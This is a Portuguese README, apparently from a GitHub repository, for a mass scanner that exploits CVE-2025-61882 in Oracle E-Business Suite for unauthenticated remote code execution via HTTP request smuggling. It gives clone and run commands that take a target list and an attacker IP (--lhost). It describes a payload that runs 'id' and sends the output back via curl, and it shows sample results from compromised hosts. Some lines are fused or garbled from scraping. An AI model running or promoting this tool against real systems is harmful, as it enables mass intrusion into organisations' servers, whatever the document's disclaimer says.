
Scanner multithread para CVE-2025-61882 no Oracle E-Business Suite, explorando contrabando de requisições HTTP para alcançar execução remota de código não autenticada e validar por meio da saída de comandos.
Um scanner em massa rápido e multithread para detectar a CVE-2025-61882 em instalações do Oracle E-Business Suite. Esta vulnerabilidade crítica permite execução remota de código não autenticada.
id e analisando a saídavuln-output.txt imediatamentepip install requests
Só isso. Basta Python 3.7+ e a biblioteca requests.
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost SEU_IP_VPS
python3 cve-2025-61882.py --targets targets.txt --lhost SEU_IP_VPS --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost SEU_IP_VPS --threads 10
Crie um arquivo targets.txt com uma URL por linha:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Carregados 1235 alvos do arquivo
[*] Executando com 20 threads concorrentes
[*] Hosts vulneráveis serão salvos em vuln-output.txt
[*] [1/1235] Verificando https://target1.com:443 na porta 7893
[*] [2/1235] Verificando https://target2.com:443 na porta 5882
[+] Encontrado! 129.146.56.43 está vulnerável
[+] Saída do comando: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Varredura concluída em 245.67 segundos
[*] Encontrados 3 alvo(s) vulnerável(is)
[*] Verifique vuln-output.txt para resultados completos
=================================================================
[+] Alvos vulneráveis encontrados:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
Os resultados são salvos em vuln-output.txt:
# Oracle EBS CVE-2025-61882 - Resultados da Varredura
# Iniciado: Ter Out 07 15:30:45 2025
# Total de alvos: 1235
# Scanner por: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id e envia a saída de volta via curluid=...gid=...Esta ferramenta é apenas para testes de segurança autorizados. Sempre:
Acesso não autorizado a sistemas de computador é ilegal.
Encontrou um bug? Tem uma solicitação de recurso?
git checkout -b feature/amazing-feature)git commit -m 'Add some feature')git push origin feature/amazing-feature)Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para detalhes.
Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Use por sua conta e risco.
Feito com ❤️ para a comunidade de infosec
| Argumento | Obrigatório | Padrão | Descrição |
|---|
--targets | Sim | - | Caminho para o arquivo contendo URLs de alvos |
--lhost | Sim | - | Seu endereço IP de VPS/atacante |
--threads | Não | 20 | Número de threads concorrentes |